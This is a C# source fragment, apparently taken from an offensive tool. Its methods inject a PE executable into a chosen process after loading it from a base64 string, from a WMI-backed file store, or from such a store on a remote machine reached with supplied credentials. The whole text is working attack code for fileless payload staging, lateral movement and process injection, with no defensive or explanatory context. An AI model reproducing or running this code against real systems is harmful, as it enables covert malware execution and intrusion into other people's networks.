public static void InjectPEWMIFS(String processId, String wmiClass, String fileName, String parameters)
{
using (PELoader peLoader = new PELoader())
{
if (!peLoader.Execute(Misc.QueryWMIFS(wmiClass, fileName)))
{
Console.WriteLine("PELoader Failed");
return;
}
_InjectPE(processId, peLoader, parameters);
}
}
public static void InjectPEString(String processId, String peString, String parameters)
{
using (PELoader peLoader = new PELoader())
{
if (!peLoader.Execute(Convert.FromBase64String(peString)))
{
Console.WriteLine("PELoader Failed");
return;
}
_InjectPE(processId, peLoader, parameters);
}
}
public static void InjectPEWMIFSRemote(String processId, String wmiClass, String system, String username, String password, String fileName, String parameters)
{
var options = new ConnectionOptions();
options.Username = username;
options.Password = password;
var scope = new ManagementScope("\\\\" + system + "\\root\\cimv2", options);
scope.Connect();
var queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");
var searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount);
ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get();
Int32 indexCount = queryIndexCollection.Count;
String EncodedText = "";
for (Int32 i = 0; i < indexCount; i++)
{
var queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'");
var searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart);
ManagementObjectCollection queryCollection = searcherFilePart.Get();
foreach (ManagementObject filePart in queryCollection)
{
EncodedText += filePart["FileStore"].ToString();
}
}
Byte[] peBytes = Convert.FromBase64String(EncodedText);
using (PELoader peLoader = new PELoader())
{
if (!peLoader.Execute(peBytes))
{
Console.WriteLine("PELoader Failed");
return;
}
_InjectPE(processId, peLoader, parameters);
}
}